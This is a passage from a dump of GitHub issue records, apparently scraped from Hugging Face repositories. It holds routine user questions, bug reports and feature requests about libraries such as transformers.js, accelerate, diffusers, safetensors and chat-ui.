(file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:52:16)\r\n at async Function.from_pretrained (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/tokenizers.js:3826:48)\r\n at async Promise.all (index 0)\r\n at async loadItems (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2193:5)\r\n at async pipeline (file:///home/rajesh/code/ai/js/invoice/node_modules/@xenova/transformers/src/pipelines.js:2139:19)", "url": "https://github.com/huggingface/transformers.js/issues/365", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-20T16:29:28Z", "updated_at": "2023-11-22T06:15:35Z", "user": "trilloc" }, { "repo": "huggingface/sentence-transformers", "number": 2335, "title": "How to get individual token embeddings of a sentence from sentence transformers", "body": "How to get individual token embeddings of a sentence from sentence transformers", "url": "https://github.com/huggingface/sentence-transformers/issues/2335", "state": "closed", "labels": [], "created_at": "2023-10-20T06:49:00Z", "updated_at": "2023-12-18T16:21:32Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/safetensors", "number": 371, "title": "Non-blocking `save_file`", "body": "### Feature request\n\nAdd the option to make calls to `safetensors.*.save_file` non-blocking to allow execution to continue while large tensors / models are being saved.\n\n### Motivation\n\nI'm writing a script to bulk-compute embeddings; however, I am getting poor GPU utilisation due to time spent saving to disk with `safetensors`. It would be nice if saving were non-blocking to allow execution to continue.\n\n### Your contribution\n\nI am unsure how this would work, but could give it a try if someone pointed me to the relevant code and some high-level steps. Happy to defer to more experienced developers~\r\n\r\nOne issue I can see with this feature is how to deal with tensors being changed after the call to `save_file` but before saving is actually complete. 
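\r\n\r\nFor illustration, the user-side workaround I have in mind (just a sketch, assuming PyTorch tensors; `save_file_async` is my own name) is to snapshot the tensors up front and hand the save to a background thread:\r\n```python\r\nimport threading\r\n\r\nfrom safetensors.torch import save_file\r\n\r\ndef save_file_async(tensors, path):\r\n    # Snapshot first so later in-place updates cannot race the save\r\n    # (save_file also requires contiguous CPU-side data).\r\n    snapshot = {k: t.detach().to(\"cpu\", copy=True).contiguous() for k, t in tensors.items()}\r\n    worker = threading.Thread(target=save_file, args=(snapshot, path), daemon=True)\r\n    worker.start()\r\n    return worker  # join() before exiting to be sure the file is complete\r\n```\r\n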
A copy would work, but maybe not appropriate for large models / tensors.", "url": "https://github.com/huggingface/safetensors/issues/371", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-10-20T05:42:47Z", "updated_at": "2023-12-11T01:48:39Z", "comments": 1, "user": "vvvm23" }, { "repo": "huggingface/huggingface_hub", "number": 1767, "title": "Request: discerning what the default model is when using `InferenceClient` without a `model`", "body": "When doing something like the below:\r\n\r\n```python\r\nclient = InferenceClient() # NOTE: no model specified\r\nclient.feature_extraction(\"hi\")\r\n```\r\n\r\nIt would be cool to know what model is being used behind the scenes. How can one figure this out programmatically?\r\n\r\nI am thinking there may be a need for a new `InferenceClient` method resembling the following:\r\n\r\n```python\r\n def get_default_model(task: str) -> str:\r\n \"\"\"Get the model's name used by default for the input task.\"\"\"\r\n```", "url": "https://github.com/huggingface/huggingface_hub/issues/1767", "state": "closed", "labels": [ "enhancement", "good first issue" ], "created_at": "2023-10-19T20:56:53Z", "updated_at": "2023-11-08T13:47:14Z", "user": "jamesbraza" }, { "repo": "huggingface/diffusers", "number": 5457, "title": "What is the function of `attention_mask` in `get_attention_scores`?", "body": "What is the function of `attention_mask` in `get_attention_scores`? I guess it is used to ignore some values when calculating the attention map.\r\nI cannot find an example in the diffusers library that actually uses this `attention_mask`. Could you provide an example of how to use it?\r\n\r\nhttps://github.com/huggingface/diffusers/blob/e5168588864d72a4dca37e90318c6b11da0eaaf1/src/diffusers/models/attention_processor.py#L454", "url": "https://github.com/huggingface/diffusers/issues/5457", "state": "closed", "labels": [ "stale" ], "created_at": "2023-10-19T18:14:38Z", "updated_at": "2023-11-28T15:05:41Z", "user": "g-jing" }, { "repo": "huggingface/accelerate", "number": 2068, "title": "How to use the cpu_offload and attach_align_device_hook functions?", "body": "attach_align_device_hook is called in the cpu_offload function. 
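\r\n\r\nFor context, this is roughly how I am driving it (a minimal sketch; the model and device are just examples):\r\n```python\r\nimport torch\r\nfrom accelerate import cpu_offload\r\nfrom diffusers import StableDiffusionPipeline\r\n\r\npipe = StableDiffusionPipeline.from_pretrained(\"runwayml/stable-diffusion-v1-5\")\r\n# Keep the UNet weights on the CPU; the hook that cpu_offload attaches\r\n# moves data to the GPU only for the duration of each forward pass.\r\ncpu_offload(pipe.unet, execution_device=torch.device(\"cuda:0\"))\r\n```\r\n\r\n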
How is skip_keys used in attach_align_device_hook?\r\n```python\r\ndef attach_align_device_hook(\r\n    module: torch.nn.Module,\r\n    execution_device: Optional[torch.device] = None,\r\n    offload: bool = False,\r\n    weights_map: Optional[Mapping] = None,\r\n    offload_buffers: bool = False,\r\n    module_name: str = \"\",\r\n    skip_keys: Optional[Union[str, List[str]]] = None,\r\n    preload_module_classes: Optional[List[str]] = None,\r\n):\r\n```\r\nI wonder what the role of skip_keys is? I see this function used in diffusers Stable Diffusion inference via enable_sequential_cpu_offload.\r\nWhat I want to achieve is to make some of the Stable Diffusion submodules run on the GPU, so that VRAM occupancy can be controlled.\r\n", "url": "https://github.com/huggingface/accelerate/issues/2068", "state": "closed", "labels": [], "created_at": "2023-10-19T10:25:07Z", "updated_at": "2023-11-26T15:06:04Z", "user": "LeonNerd" }, { "repo": "huggingface/accelerate", "number": 2067, "title": "how to automatically load state dict from memory to a multi-gpu device?", "body": "```python\r\nconfig_dict = AutoConfig.from_pretrained(model_config, device_map=\"auto\")\r\nmodel = AutoModelForCausalLM.from_config(config_dict)\r\nraw_state_dict = torch.load(args.model_path, map_location=\"cpu\")\r\nstate_dict = convert_ckpt(raw_state_dict)\r\nmodel.load_state_dict(state_dict, strict=False)\r\n```\r\n\r\n`model.load_state_dict(state_dict, strict=False)` only loads the state dict onto a single GPU, even when `device_map=\"auto\"` is set by `AutoConfig`. Additionally, the `load_checkpoint_and_dispatch` function only accepts a file path as the `checkpoint` parameter.\r\n\r\nIs there any way to automatically load a state dict from memory onto a multi-GPU device?", "url": "https://github.com/huggingface/accelerate/issues/2067", "state": "closed", "labels": [], "created_at": "2023-10-19T05:57:39Z", "updated_at": "2023-12-22T15:06:31Z", "user": "tlogn" }, { "repo": "huggingface/accelerate", "number": 2064, "title": "How to use `gather_for_metrics()` with decoder-generated strings to compute rouge score?", "body": "I am fine-tuning an encoder-decoder model and, during the validation step, using the `.generate` method to generate tokens from the decoder that are subsequently decoded into strings (in this case classes). 
These generations are occurring across 8 GPUs and I am using Accelerate to manage the distribution.\r\n\r\nMy hope was to append these strings to lists, and pass the lists to `gather_for_metrics()` on each GPU to get a \"master list\" of predictions and references, added to the rouge metric and then computed:\r\n\r\n```python\r\npredictions, references = accelerator.gather_for_metrics(\r\n    (predictions, references)\r\n)\r\n\r\nrouge_metric.add_batch(\r\n    predictions=predictions,\r\n    references=references,\r\n)\r\n\r\nrouge_score = rouge_metric.compute(rouge_types=[\"rougeL\"], use_aggregator=True)[\"rougeL\"]\r\n```\r\n\r\nAfter encountering some strange errors, I noticed that `gather_for_metrics()` will [only interact with tensors](https://huggingface.co/docs/accelerate/v0.19.0/en/package_reference/accelerator#accelerate.Accelerator.gather_for_metrics)\r\n\r\nAnd from what I can tell, you cannot create a torch.Tensor with string members.\r\n\r\nHow do the accelerate folks recommend using `gather_for_metrics()` with decoder-generated strings?\r\n", "url": "https://github.com/huggingface/accelerate/issues/2064", "state": "closed", "labels": [ "solved" ], "created_at": "2023-10-18T19:25:29Z", "updated_at": "2023-12-25T15:07:03Z", "user": "plamb-viso" }, { "repo": "huggingface/transformers.js", "number": 364, "title": "[Question] Error in getModelJSON with React", "body": " Hey, I am trying to transcribe audio to text using transformers.js. I tried two ways: \r\n\r\n1. https://huggingface.co/docs/transformers.js/api/pipelines#pipelinesautomaticspeechrecognitionpipeline\r\n2. https://huggingface.co/docs/transformers.js/tutorials/react\r\n\r\nBut I seem to get an error like this\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/67155124/bfa37f1b-6b57-42f9-8792-8542fc2fc958)\r\n\r\nFiles for your reference: https://filebin.net/88munmsfk4u0127m\r\n\r\nPlease do let me know if I am doing something wrong or what the best way is using ReactJS\r\n", "url": "https://github.com/huggingface/transformers.js/issues/364", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-18T16:57:20Z", "updated_at": "2024-01-24T19:54:17Z", "user": "ajaykrupalk" }, { "repo": "huggingface/transformers.js", "number": 363, "title": "[Question] Build step process for Vercel", "body": "Hi, I am currently in the process of trying to deploy to Vercel using Next.js.\r\nI am using pnpm as my package manager and have put the model in the public folder.\r\nI hit this error when building; is there something necessary post-install, just as #295 has done?\r\n\r\nI don't understand why this step is necessary\r\n\r\n```\r\nAn error occurred while writing the file to cache: [Error: ENOENT: no such file or directory, mkdir '/var/task/node_modules/.pnpm/@xenova+transformers@2.6.2/node_modules/@xenova/transformers/.cache'\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/363", "state": "open", "labels": [ "question" ], "created_at": "2023-10-18T00:27:18Z", "updated_at": "2024-04-06T06:23:06Z", "user": "kyeshmz" }, { "repo": "huggingface/setfit", "number": 432, "title": "[Q] How to ensure reproducibility", "body": "Can someone explain how to ensure reproducibility of a pre-trained model (\"sentence-transformers/paraphrase-mpnet-base-v2\")? \r\n\r\nI thought that the result would be reproducible because SetFitTrainer() has a default random seed in its constructor, but found that it was not the case. 
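\r\n\r\nRoughly what I am running (a minimal sketch with a dummy dataset):\r\n```python\r\nfrom datasets import Dataset\r\nfrom setfit import SetFitModel, SetFitTrainer\r\n\r\nmodel = SetFitModel.from_pretrained(\"sentence-transformers/paraphrase-mpnet-base-v2\")\r\ntrain_ds = Dataset.from_dict({\"text\": [\"great\", \"terrible\"], \"label\": [1, 0]})\r\n\r\ntrainer = SetFitTrainer(model=model, train_dataset=train_ds)  # default seed\r\ntrainer.train()  # two runs of this script still give different results\r\n```\r\n\r\n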
SetFitTrainer source code indicates that \"to ensure reproducibility across runs, I need to use [`~SetTrainer.model_init`] function to instantiate the model\". But I don't understand what that entails. \r\n\r\nIs there an example that I can follow? \r\n\r\nAny help would be highly appreciated. \r\n\r\nThanks, ", "url": "https://github.com/huggingface/setfit/issues/432", "state": "closed", "labels": [], "created_at": "2023-10-17T23:47:46Z", "updated_at": "2023-12-06T13:19:54Z", "user": "youngjin-lee" }, { "repo": "huggingface/chat-ui", "number": 519, "title": ".env.local preprompt env variable with multiple lines", "body": "Hi,\r\nI have a preprompt which is basically a 2-shot inference prompt: very long text (around 1200 lines) that I want to add as a preprompt, but the .env file does not allow multi-line text as a variable.\r\nAny idea how to handle this?", "url": "https://github.com/huggingface/chat-ui/issues/519", "state": "open", "labels": [], "created_at": "2023-10-17T18:34:30Z", "updated_at": "2023-11-07T13:11:21Z", "comments": 6, "user": "RachelShalom" }, { "repo": "huggingface/optimum", "number": 1459, "title": "nougat to onnx", "body": "### Feature request\r\n\r\nI would like to convert the [nougat](https://huggingface.co/facebook/nougat-base) model to ONNX; is it possible to do it through optimum?\r\n\r\n### Motivation\r\n\r\nNougat is a [Donut](https://huggingface.co/docs/transformers/model_doc/donut) model trained to transcribe scientific PDFs into an easy-to-use markdown format.", "url": "https://github.com/huggingface/optimum/issues/1459", "state": "closed", "labels": [], "created_at": "2023-10-17T10:03:15Z", "updated_at": "2024-08-27T06:16:17Z", "comments": 3, "user": "arvisioncode" }, { "repo": "huggingface/diffusers", "number": 5416, "title": "How to correctly implement a class-conditional model", "body": "Hi, I'd like to implement a DDPM that is class-conditioned, but not conditioned on anything else (no text), using `UNet2DConditionModel`. I'm training from scratch. \r\n\r\nI'm calling the model with `noise_pred = model(noisy_images, timesteps, class_labels=class_labels, return_dict=False)[0]`, but I get the error `UNet2DConditionModel.forward() missing 1 required positional argument: 'encoder_hidden_states'`. However, when I set `encoder_hidden_states` to `None`, I get `TypeError: AttnDownBlock2D.forward() got an unexpected keyword argument 'scale'`. I'm not sure what `encoder_hidden_states` should be set to since I'm only using class conditioning.\r\n\r\nThanks!", "url": "https://github.com/huggingface/diffusers/issues/5416", "state": "closed", "labels": [], "created_at": "2023-10-16T20:53:41Z", "updated_at": "2023-10-16T21:02:39Z", "user": "nickk124" }, { "repo": "huggingface/chat-ui", "number": 511, "title": "ChatUI on HuggingFace Spaces errors out with PermissionError: [Errno 13] Permission denied ", "body": "When I try following the two tutorials below, I hit the same error, where the container code tries to create a directory and fails due to permission issues on the host.\r\n\r\ntutorials: \r\n1. https://huggingface.co/docs/hub/spaces-sdks-docker-chatui#chatui-on-spaces\r\n2. 
https://huggingface.co/blog/Llama2-for-non-engineers\r\n\r\nNote: I have set the env vars `HUGGING_FACE_HUB_TOKEN` and in a prior attempt `HF_TOKEN` as well.\r\n\r\n\"Screenshot\r\n\r\n\r\nstack trace on hugging face space\r\n```\r\nTraceback (most recent call last):\r\n\r\n File \"/opt/conda/bin/text-generation-server\", line 8, in \r\n sys.exit(app())\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/cli.py\", line 131, in download_weights\r\n utils.download_and_unload_peft(\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/peft.py\", line 38, in download_and_unload_peft\r\n os.makedirs(model_id, exist_ok=True)\r\n\r\n File \"/opt/conda/lib/python3.9/os.py\", line 215, in makedirs\r\n makedirs(head, exist_ok=exist_ok)\r\n\r\n File \"/opt/conda/lib/python3.9/os.py\", line 225, in makedirs\r\n mkdir(name, mode)\r\n\r\nPermissionError: [Errno 13] Permission denied: 'skrelan'\r\n```\r\n", "url": "https://github.com/huggingface/chat-ui/issues/511", "state": "open", "labels": [ "support", "spaces" ], "created_at": "2023-10-16T08:29:06Z", "updated_at": "2023-12-17T02:58:52Z", "comments": 3, "user": "Skrelan" }, { "repo": "huggingface/candle", "number": 1105, "title": "How to run a model in Fp16?", "body": "EDIT: Never mind, see below comment ", "url": "https://github.com/huggingface/candle/issues/1105", "state": "closed", "labels": [], "created_at": "2023-10-16T03:32:16Z", "updated_at": "2023-10-18T19:40:54Z", "user": "joeyballentine" }, { "repo": "huggingface/candle", "number": 1104, "title": "How to load .pth file weights?", "body": "I've been experimenting with candle and re-implementing ESRGAN in it. I ended up needing to convert a couple .pth files I have into .safetensors format in python in order to load them into the VarBuilder. I saw on the docs you say this supports loading pytorch weights directly though, but there does not seem to be an example on how to do that. I looked into the pickle module included in the library and got as far as being able to read the weights into a pickle format with TensorInfo, but then I got stuck trying to convert those to tensors and get it in a format VarBuilder would accept.\r\n\r\nAn example on how to either load these weights or convert them to safetensors format in rust would be great, thanks!", "url": "https://github.com/huggingface/candle/issues/1104", "state": "open", "labels": [], "created_at": "2023-10-16T03:29:53Z", "updated_at": "2023-10-19T22:01:42Z", "user": "joeyballentine" }, { "repo": "huggingface/datasets", "number": 6303, "title": "Parquet uploads off-by-one naming scheme", "body": "### Describe the bug\n\nI noticed this numbering scheme not matching up in a different project and wanted to raise it as an issue for discussion, what is the actual proper way to have these stored?\r\n\r\n\"image\"\r\n\r\nThe `-SSSSS-of-NNNNN` seems to be used widely across the codebase. The section that creates the part in my screenshot is here https://github.com/huggingface/datasets/blob/main/src/datasets/arrow_dataset.py#L5287\r\nThere are also some edits to this section in the single commit branch.\n\n### Steps to reproduce the bug\n\n1. Upload a dataset that requires at least two parquet files in it\r\n2. Observe the naming scheme\n\n### Expected behavior\n\nThe couple options here are of course **1. keeping it as is**\r\n\r\n**2. Starting the index at 1:**\r\ntrain-00001-of-00002-{hash}.parquet\r\ntrain-00002-of-00002-{hash}.parquet\r\n\r\n**3. 
My preferred option** (which would solve my specific issue), dropping the total entirely:\r\ntrain-00000-{hash}.parquet\r\ntrain-00001-{hash}.parquet\r\n\r\nThis also solves an issue that will occur with an `append` variable for `push_to_hub` (see https://github.com/huggingface/datasets/issues/6290) where as you add a new parquet file, you need to rename everything in the repo as well. \r\n\r\nHowever, I know there are parts of the repo that use 0 as the starting file or may require the total, so raising the question for discussion.\r\n\n\n### Environment info\n\n- `datasets` version: 2.14.6.dev0\r\n- Platform: macOS-14.0-arm64-arm-64bit\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.18.0\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 1.5.3", "url": "https://github.com/huggingface/datasets/issues/6303", "state": "open", "labels": [], "created_at": "2023-10-14T18:31:03Z", "updated_at": "2023-10-16T16:33:21Z", "comments": 4, "user": "ZachNagengast" }, { "repo": "huggingface/diffusers", "number": 5392, "title": "How to train an unconditional latent diffusion model ?", "body": "It seems that there is only one available unconditional LDM model (CompVis/ldm-celebahq-256). \r\n```python\r\npipeline = LDMPipeline.from_pretrained(\"CompVis/ldm-celebahq-256\")\r\n```\r\nHow can I train this unconditional model on my own dataset? The LDM model includes the training of both `VQModel` and `UNet2DModel`, but the [official training examples](https://github.com/huggingface/diffusers/blob/main/examples/unconditional_image_generation/train_unconditional.py) seem not to be fully applicable.\r\n", "url": "https://github.com/huggingface/diffusers/issues/5392", "state": "closed", "labels": [], "created_at": "2023-10-14T03:32:34Z", "updated_at": "2024-02-16T08:59:49Z", "user": "Rashfu" }, { "repo": "huggingface/safetensors", "number": 368, "title": "Streaming weights into a model directly?", "body": "### Feature request\r\n\r\nHi! I'm curious whether there is a way to stream model weights from disk into the on-GPU model directly?\r\n\r\nThat is, [I see](https://huggingface.co/docs/safetensors/speed#gpu-benchmark) that by settings `os.environ[\"SAFETENSORS_FAST_GPU\"] = \"1\"` and using `load_file`, you can stream the weights themselves from disk to GPU. But if I understand correctly, one still has to wait for all of the weights to be moved to GPU before they can subsequently be loaded into the model itself: first load the weights to GPU by some means (possibly streaming), then `model.load(weights)`, schematically. \r\n\r\nIs there a way to overlap the loading-into-model step with the streaming from disk?\r\n\r\nIs something like that possible? Or already implemented somewhere?\r\n\r\n### Motivation\r\n\r\nFaster model loading.\r\n\r\n### Your contribution\r\n\r\nI don't know `rust`, but would be happy to contribute `python`-side. Just not sure if the request is feasible.", "url": "https://github.com/huggingface/safetensors/issues/368", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-10-13T15:21:33Z", "updated_at": "2023-12-11T01:48:41Z", "comments": 1, "user": "garrett361" }, { "repo": "huggingface/huggingface_hub", "number": 1734, "title": "Docs request: what is loaded/loadable?", "body": "When working with `get_model_status`: https://huggingface.co/docs/huggingface_hub/main/en/package_reference/inference_client#huggingface_hub.InferenceClient.get_model_status\r\n\r\nIt tells you if the model is loadable and/or loaded. 
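\r\n\r\nFor concreteness, the call in question (the model id is just an example):\r\n```python\r\nfrom huggingface_hub import InferenceClient\r\n\r\nclient = InferenceClient()\r\nstatus = client.get_model_status(\"bigscience/bloom\")\r\nprint(status)\r\n# e.g. ModelStatus(loaded=True, state='Loaded', compute_type='gpu',\r\n#      framework='text-generation-inference')\r\n```\r\n\r\n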
The question is, what does this mean?\r\n- What does \"loaded\" mean... what is it loaded into?\r\n- If something isn't loaded, but is loadable, how can one load it?", "url": "https://github.com/huggingface/huggingface_hub/issues/1734", "state": "closed", "labels": [], "created_at": "2023-10-13T04:59:47Z", "updated_at": "2023-10-17T14:18:11Z", "user": "jamesbraza" }, { "repo": "huggingface/trl", "number": 868, "title": "What is the difference between these two saved checkpoints in the sft_llama2 example?", "body": "I am trying to understand this\r\nhttps://github.com/huggingface/trl/blob/main/examples/research_projects/stack_llama_2/scripts/sft_llama2.py#L206C1-L206C1\r\n\r\n`trainer.model.save_pretrained(output_dir)` already seems to save the base+lora model to the \"final_checkpoint\".\r\nThen what is `model = model.merge_and_unload()` doing here, and why save it again to \"final_merged_checkpoint\"?\r\n```\r\ntrainer.save_model(script_args.output_dir)\r\n\r\noutput_dir = os.path.join(script_args.output_dir, \"final_checkpoint\")\r\ntrainer.model.save_pretrained(output_dir)\r\n\r\n# Free memory for merging weights\r\ndel base_model\r\ntorch.cuda.empty_cache()\r\n\r\nmodel = AutoPeftModelForCausalLM.from_pretrained(output_dir, device_map=\"auto\", torch_dtype=torch.bfloat16)\r\nmodel = model.merge_and_unload()\r\n\r\noutput_merged_dir = os.path.join(script_args.output_dir, \"final_merged_checkpoint\")\r\nmodel.save_pretrained(output_merged_dir, safe_serialization=True)\r\n```", "url": "https://github.com/huggingface/trl/issues/868", "state": "closed", "labels": [], "created_at": "2023-10-13T04:31:57Z", "updated_at": "2023-10-30T17:15:35Z", "user": "Emerald01" }, { "repo": "huggingface/blog", "number": 1577, "title": "How to use mAP metric for object detection task?", "body": "I use the pretrained checkpoint `facebook/detr-resnet-50`. \r\nHow can I use mAP for metric evaluation?\r\n```\r\ncheckpoint = \"facebook/detr-resnet-50\"\r\nmodel = AutoModelForObjectDetection.from_pretrained(\r\n checkpoint, ..., ignore_mismatched_sizes=True,\r\n)\r\n\r\nmetric = evaluate.load('repllabs/mean_average_precision')\r\n\r\ndef compute_metrics(eval_pred):\r\n logits, labels = eval_pred\r\n predictions = np.argmax(logits, axis=-1)\r\n return metric.compute(predictions=predictions, references=labels)\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n args=training_args,\r\n data_collator=collate_fn,\r\n train_dataset=dataset[\"train\"].with_transform(transform_aug_ann),\r\n eval_dataset=dataset[\"test\"].with_transform(transform_aug_ann),\r\n compute_metrics=compute_metrics,\r\n tokenizer=image_processor,\r\n)\r\n```\r\nI tried this way, but I get some errors here.", "url": "https://github.com/huggingface/blog/issues/1577", "state": "open", "labels": [], "created_at": "2023-10-12T13:58:52Z", "updated_at": "2023-12-04T12:01:33Z", "user": "IamSVP94" }, { "repo": "huggingface/accelerate", "number": 2051, "title": "Accelerate Examples: What is expected to print on the terminal?", "body": "### System Info\r\n\r\n```Shell\r\n- `Accelerate` version: 0.23.0\r\n- Platform: Linux-5.4.0-121-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.13\r\n- Numpy version: 1.26.0\r\n- PyTorch version (GPU?): 1.13.1 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- System RAM: 1007.69 GB\r\n- GPU type: NVIDIA A100-SXM4-40GB\r\n- `Accelerate` default config:\r\n - compute_environment: LOCAL_MACHINE\r\n - distributed_type: MULTI_GPU\r\n - mixed_precision: fp16\r\n - use_cpu: False\r\n - debug: False\r\n - num_processes: 
2\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - gpu_ids: 3,4\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [X] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nI was trying to run a simple example (`nlp_example.py`) to kind of perform the equivalent of a hello world task in accelerate, but unfortunately, I'm uncertain as to whether it's working correctly, and I'm somewhat embarrassed to have to post this issue ticket to seek assistance. \ud83d\ude05\r\n\r\nI ran `$ python examples/nlp_example.py --cpu ` and got this output:\r\n\r\n```bash\r\nSome weights of BertForSequenceClassification were not initialized from the model checkpoint at bert-base-cased and are newly initialized: ['classifier.bias', 'classifier.weight']\r\nYou should probably TRAIN this model on a down-stream task to be able to use it for predictions and inference.\r\nYou're using a BertTokenizerFast tokenizer. Please note that with a fast tokenizer, using the `__call__` method is faster than using a method to encode the text followed by a call to the `pad` method to get a padded encoding.\r\n```\r\n\r\nI believe the program continues to run after the above message is printed because control of the terminal's prompt isn't returned to me.\r\n\r\nThere isn't a tqdm bar, progress bar, or signs of life of some sort to indicate that the example was running.\r\n\r\nWould be great if someone who has some success at running any basic accelerate example scripts to chime in \ud83d\ude42\r\n\r\n### Expected behavior\r\n\r\nSigns of life of some sort to indicate that the example is running fine.", "url": "https://github.com/huggingface/accelerate/issues/2051", "state": "closed", "labels": [], "created_at": "2023-10-12T13:50:40Z", "updated_at": "2023-10-12T15:06:44Z", "user": "davidleejy" }, { "repo": "huggingface/text-generation-inference", "number": 1137, "title": "When I start the model, I get a warning message. I want to know why and how to solve it.", "body": "### System Info\r\n\r\n\r\n- OS version: Debian GNU/Linux 11 (bullseye)\r\n- Commit sha: 00b8f36fba62e457ff143cce35564ac6704db860\r\n- Cargo version: 1.70.0\r\n- model: Starcoder\r\n- nvidia-smi:\r\n```\r\nThu Oct 12 18:23:03 2023\r\n +---------------------------------------------------------------------------------------+\r\n | NVIDIA-SMI 535.54.03 Driver Version: 535.54.03 CUDA Version: 12.2 |\r\n |-----------------------------------------+----------------------+----------------------+\r\n | GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\r\n | Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\r\n | | | MIG M. 
|\r\n |=========================================+======================+======================|\r\n | 0 NVIDIA A800-SXM4-80GB On | 00000000:4B:00.0 Off | 0 |\r\n | N/A 29C P0 73W / 400W | 36679MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 1 NVIDIA A800-SXM4-80GB On | 00000000:51:00.0 Off | 0 |\r\n | N/A 31C P0 62W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 2 NVIDIA A800-SXM4-80GB On | 00000000:6A:00.0 Off | 0 |\r\n | N/A 31C P0 61W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 3 NVIDIA A800-SXM4-80GB On | 00000000:6F:00.0 Off | 0 |\r\n | N/A 29C P0 61W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 4 NVIDIA A800-SXM4-80GB On | 00000000:8D:00.0 Off | 0 |\r\n | N/A 28C P0 61W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 5 NVIDIA A800-SXM4-80GB On | 00000000:92:00.0 Off | 0 |\r\n | N/A 30C P0 62W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 6 NVIDIA A800-SXM4-80GB On | 00000000:C9:00.0 Off | 0 |\r\n | N/A 32C P0 67W / 400W | 78233MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n | 7 NVIDIA A800-SXM4-80GB On | 00000000:CF:00.0 Off | 0 |\r\n | N/A 29C P0 58W / 400W | 5MiB / 81920MiB | 0% Default |\r\n | | | Disabled |\r\n +-----------------------------------------+----------------------+----------------------+\r\n\r\n +---------------------------------------------------------------------------------------+\r\n | Processes: |\r\n | GPU GI CI PID Type Process name GPU Memory |\r\n | ID ID Usage |\r\n |=======================================================================================|\r\n +---------------------------------------------------------------------------------------+\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [X] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported command\r\n- [X] My own modifications\r\n\r\n### Reproduction\r\n\r\nMy execution command is:\r\n\r\n```\r\nCUDA_VISIBLE_DEVICES=0 /workspace/xieshijie/text-generation-inference/target/release/deps/text_generation_launcher-b64a71565ded74a5 --model-id /workspace/xieshijie/huggingface-models/starcoder2/models--bigcode--starcoder/snapshots/e117ab3b3d0769fd962bd48b099de711757a3d60 --port 6006 --max-input-length 8000 --max-total-tokens 8192 --max-batch-prefill", "url": "https://github.com/huggingface/text-generation-inference/issues/1137", "state": "closed", "labels": [], "created_at": "2023-10-12T10:33:38Z", "updated_at": "2023-10-19T07:02:58Z", "user": "coder-xieshijie" }, { "repo": "huggingface/datasets", "number": 6299, "title": "Support for newer versions of JAX", "body": "### Feature request\r\n\r\nHi,\r\n\r\nI like your idea of adapting the datasets library to be usable with JAX. 
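Thank you for that. For context, the only integration I actually need is the formatting API, roughly (a minimal sketch; the dataset name is just an example):

```python
from datasets import load_dataset

# with_format("jax") should hand back jax.numpy arrays instead of python lists
ds = load_dataset("mnist", split="train").with_format("jax")
batch = ds[:8]  # a dict of jnp arrays, ready for jit-ed functions
```
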
However, in your [setup.py](https://github.com/huggingface/datasets/blob/main/setup.py), you enforce old versions of JAX <= 0.3... It is very cumbersome!\r\n\r\nWhat is the rationale for such a limitation? Can you remove it please?\r\n\r\nThanks,\r\n\r\n### Motivation\r\n\r\nThis library is unusable with new versions of JAX.\r\n\r\n### Your contribution\r\n\r\nYes.", "url": "https://github.com/huggingface/datasets/issues/6299", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-10-12T10:03:46Z", "updated_at": "2023-10-12T16:28:59Z", "comments": 0, "user": "ddrous" }, { "repo": "huggingface/diffusers", "number": 5372, "title": "How to use safety_checker in StableDiffusionXLPipeline?", "body": "### Describe the bug\r\n\r\nI want to use safety_checker in StableDiffusionXLPipeline, but it seems that the `safety_checker` keyword does not take effect.\r\n\r\n### Reproduction\r\n\r\n```python\r\npipe = StableDiffusionXLPipeline.from_pretrained(\r\n \"nyxia/mysterious-xl\",\r\n torch_dtype=torch.float16,\r\n safety_checker = 